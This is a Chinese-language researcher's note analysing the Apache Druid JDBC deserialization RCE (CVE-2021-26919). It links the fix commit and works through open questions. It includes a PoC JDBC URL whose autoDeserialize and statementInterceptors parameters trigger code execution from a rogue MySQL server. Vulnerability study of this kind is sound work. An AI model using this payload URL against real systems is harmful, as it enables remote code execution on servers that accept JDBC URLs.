【漏洞分析】
Apache Druid 远程代码执行漏洞(CVE-2021-26919)
- Apache Druid allows users to read data from other database systems using JDBC. This functionality is to allow trusted users with the proper permissions to set up lookups or submit ingestion tasks. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Druid server processes. This issue was addressed in Apache Druid 0.20.2
- 原理分析:http://f5.pm/go-70441.html
理解与消化:
- 已知是jdbc mysql反序列化的问题,可以直接看看官方的修复
- 具体在这个commit里
- https://github.com/apache/druid/commit/48953e3508967f5156c69676432b5d4dd25ea678
- 代码更新很多,主要用途是设置了jdbc:mysql & jdbc:postgresql两类driver和对应的参数白名单。
- 问题:设立白名单之前其他参数都能用,那么一共有哪些可选参数?
- 关键似乎是下面这段注释及上下文代码内容,判断还是getConnection的问题.
// We validate only the connection URL here as all properties will be read from only the URL except
// users and password. If we want to allow another way to specify user properties such as using
// MetadataStorageConnectorConfig.getDbcpProperties(), those properties should be validated as well.
攻击POC与用到的参数:
- autoDeserialize【有用】、statementInterceptors【有用】、maxAllowedPacket【似乎没用】
- 用到的值:com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
user ="cb1"
password="password"
仍然待搞清楚的问题
- 除了autoDeserialize【有用】、statementInterceptors【有用】、maxAllowedPacket【似乎没用】这几个参数外,还有哪些其他可选参数?
- 估计是mysql里面的参数,不在druid里的;
- 为什么是com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor这个参数值?还有那些其他值?
- 真是利用条件Sink点是getConnection,还有什么其他利用条件?